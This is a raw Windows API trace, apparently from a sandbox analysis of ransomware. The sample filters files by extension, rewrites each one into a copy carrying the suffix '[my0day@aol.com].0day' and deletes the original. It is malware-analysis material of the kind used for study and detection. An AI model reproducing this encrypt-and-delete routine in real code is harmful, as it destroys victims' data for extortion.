[0035.660] lstrlenW (lpString=".ppt") returned 4 [0035.660] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0035.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.660] lstrlenW (lpString=".zip") returned 4 [0035.660] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0035.660] lstrlenW (lpString=".rar") returned 4 [0035.660] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0035.660] lstrlenW (lpString=".bz2") returned 4 [0035.660] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0035.660] lstrlenW (lpString=".7z") returned 3 [0035.660] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0035.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.660] lstrlenW (lpString=".dbf") returned 4 [0035.660] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0035.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.660] lstrlenW (lpString=".1cd") returned 4 [0035.660] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0035.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.661] lstrlenW (lpString=".jpg") returned 4 [0035.661] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0035.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.661] lstrlenW (lpString=".doc") returned 4 [0035.661] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0035.661] lstrlenW (lpString=".docx") returned 5 [0035.661] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1 [0035.661] lstrlenW (lpString=".pdf") returned 4 [0035.661] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0035.661] lstrlenW (lpString=".xls") returned 4 [0035.661] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0035.661] lstrlenW (lpString=".xlsx") returned 5 [0035.661] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1 [0035.661] lstrlenW (lpString=".ppt") returned 4 [0035.661] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0035.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.661] lstrlenW (lpString=".zip") returned 4 [0035.661] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0035.661] lstrlenW (lpString=".rar") returned 4 [0035.661] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0035.661] lstrlenW (lpString=".bz2") returned 4 [0035.661] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0035.661] lstrlenW (lpString=".7z") returned 3 [0035.661] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0035.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.661] lstrlenW (lpString=".dbf") returned 4 [0035.661] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0035.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.661] lstrlenW (lpString=".1cd") returned 4 [0035.661] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0035.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.661] lstrlenW (lpString=".jpg") returned 4 [0035.662] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0035.662] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.662] lstrlenW (lpString="branding.xml") returned 12 [0035.662] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.678] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=596341) returned 1 [0035.678] CloseHandle (hObject=0x188) returned 1 [0035.678] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 0x2020 [0035.678] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.678] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.678] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.678] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.678] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0035.678] GetLastError () returned 0x0 [0035.678] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x91975, lpOverlapped=0x0) returned 1 [0035.691] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x91980, lpOverlapped=0x0) returned 1 [0035.703] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0035.703] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.703] SetEndOfFile (hFile=0x198) returned 1 [0035.703] CloseHandle (hObject=0x198) returned 1 [0036.153] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.160] SetEndOfFile (hFile=0x188) returned 1 [0036.168] CloseHandle (hObject=0x188) returned 1 [0036.168] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0036.169] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 1 [0036.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.169] lstrlenW (lpString=".doc") returned 4 [0036.169] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.169] lstrlenW (lpString=".docx") returned 5 [0036.169] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0036.169] lstrlenW (lpString=".pdf") returned 4 [0036.169] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.169] lstrlenW (lpString=".xls") returned 4 [0036.169] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.169] lstrlenW (lpString=".xlsx") returned 5 [0036.169] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0036.169] lstrlenW (lpString=".ppt") returned 4 [0036.169] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.169] lstrlenW (lpString=".zip") returned 4 [0036.169] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.169] lstrlenW (lpString=".rar") returned 4 [0036.169] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.169] lstrlenW (lpString=".bz2") returned 4 [0036.169] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.169] lstrlenW (lpString=".7z") returned 3 [0036.169] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.169] lstrlenW (lpString=".dbf") returned 4 [0036.169] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.170] lstrlenW (lpString=".1cd") returned 4 [0036.170] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.170] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.170] lstrlenW (lpString=".jpg") returned 4 [0036.170] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.170] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.170] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.170] lstrlenW (lpString=".doc") returned 4 [0036.170] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.170] lstrlenW (lpString=".docx") returned 5 [0036.170] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0036.170] lstrlenW (lpString=".pdf") returned 4 [0036.170] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.170] lstrlenW (lpString=".xls") returned 4 [0036.170] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.170] lstrlenW (lpString=".xlsx") returned 5 [0036.170] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0036.170] lstrlenW (lpString=".ppt") returned 4 [0036.170] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.170] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.170] lstrlenW (lpString=".zip") returned 4 [0036.170] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.170] lstrlenW (lpString=".rar") returned 4 [0036.170] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.170] lstrlenW (lpString=".bz2") returned 4 [0036.170] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.170] lstrlenW (lpString=".7z") returned 3 [0036.170] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.170] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.170] lstrlenW (lpString=".dbf") returned 4 [0036.170] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.170] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.170] lstrlenW (lpString=".1cd") returned 4 [0036.170] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.170] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.171] lstrlenW (lpString=".jpg") returned 4 [0036.171] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.171] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0036.171] lstrlenW (lpString="MS.GIF") returned 6 [0036.171] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.503] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1069) returned 1 [0036.503] CloseHandle (hObject=0x1c0) returned 1 [0036.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 0x20 [0036.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.503] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.503] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0036.503] GetLastError () returned 0x0 [0036.504] ReadFile (in: hFile=0x1c0, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x42d, lpOverlapped=0x0) returned 1 [0036.505] WriteFile (in: hFile=0x1bc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x430, lpOverlapped=0x0) returned 1 [0036.506] ReadFile (in: hFile=0x1c0, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0036.506] WriteFile (in: hFile=0x1bc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe0, lpOverlapped=0x0) returned 1 [0036.506] SetEndOfFile (hFile=0x1bc) returned 1 [0036.506] CloseHandle (hObject=0x1bc) returned 1 [0036.507] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.507] SetEndOfFile (hFile=0x1c0) returned 1 [0036.507] CloseHandle (hObject=0x1c0) returned 1 [0036.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0036.508] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 1 [0036.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.508] lstrlenW (lpString=".doc") returned 4 [0036.508] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0036.508] lstrlenW (lpString=".docx") returned 5 [0036.508] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1 [0036.508] lstrlenW (lpString=".pdf") returned 4 [0036.508] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0036.508] lstrlenW (lpString=".xls") returned 4 [0036.508] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0036.508] lstrlenW (lpString=".xlsx") returned 5 [0036.508] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1 [0036.508] lstrlenW (lpString=".ppt") returned 4 [0036.508] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0036.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.508] lstrlenW (lpString=".zip") returned 4 [0036.508] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0036.508] lstrlenW (lpString=".rar") returned 4 [0036.508] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0036.508] lstrlenW (lpString=".bz2") returned 4 [0036.508] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0036.508] lstrlenW (lpString=".7z") returned 3 [0036.509] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0036.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.509] lstrlenW (lpString=".dbf") returned 4 [0036.509] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0036.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.509] lstrlenW (lpString=".1cd") returned 4 [0036.509] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0036.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.509] lstrlenW (lpString=".jpg") returned 4 [0036.509] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0036.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.509] lstrlenW (lpString=".doc") returned 4 [0036.509] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0036.509] lstrlenW (lpString=".docx") returned 5 [0036.509] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1 [0036.509] lstrlenW (lpString=".pdf") returned 4 [0036.509] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0036.509] lstrlenW (lpString=".xls") returned 4 [0036.509] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0036.509] lstrlenW (lpString=".xlsx") returned 5 [0036.509] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1 [0036.509] lstrlenW (lpString=".ppt") returned 4 [0036.509] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0036.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.509] lstrlenW (lpString=".zip") returned 4 [0036.509] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0036.509] lstrlenW (lpString=".rar") returned 4 [0036.509] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0036.509] lstrlenW (lpString=".bz2") returned 4 [0036.509] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0036.509] lstrlenW (lpString=".7z") returned 3 [0036.509] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0036.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.510] lstrlenW (lpString=".dbf") returned 4 [0036.510] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0036.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.510] lstrlenW (lpString=".1cd") returned 4 [0036.510] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0036.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.510] lstrlenW (lpString=".jpg") returned 4 [0036.510] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0036.510] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0036.510] lstrlenW (lpString="MS.PNG") returned 6 [0036.510] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.510] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1682) returned 1 [0036.510] CloseHandle (hObject=0x1c0) returned 1 [0036.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 0x20 [0036.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.510] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.510] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.511] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0036.511] GetLastError () returned 0x0 [0036.511] ReadFile (in: hFile=0x1c0, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x692, lpOverlapped=0x0) returned 1 [0036.512] WriteFile (in: hFile=0x1bc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x6a0, lpOverlapped=0x0) returned 1 [0036.513] ReadFile (in: hFile=0x1c0, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0036.513] WriteFile (in: hFile=0x1bc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe0, lpOverlapped=0x0) returned 1 [0036.513] SetEndOfFile (hFile=0x1bc) returned 1 [0036.513] CloseHandle (hObject=0x1bc) returned 1 [0036.514] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.514] SetEndOfFile (hFile=0x1c0) returned 1 [0036.515] CloseHandle (hObject=0x1c0) returned 1 [0036.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0036.515] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 1 [0036.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.515] lstrlenW (lpString=".doc") returned 4 [0036.515] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0036.515] lstrlenW (lpString=".docx") returned 5 [0036.515] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1 [0036.515] lstrlenW (lpString=".pdf") returned 4 [0036.515] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0036.515] lstrlenW (lpString=".xls") returned 4 [0036.515] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0036.515] lstrlenW (lpString=".xlsx") returned 5 [0036.515] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1 [0036.515] lstrlenW (lpString=".ppt") returned 4 [0036.516] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0036.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.516] lstrlenW (lpString=".zip") returned 4 [0036.516] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0036.516] lstrlenW (lpString=".rar") returned 4 [0036.516] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 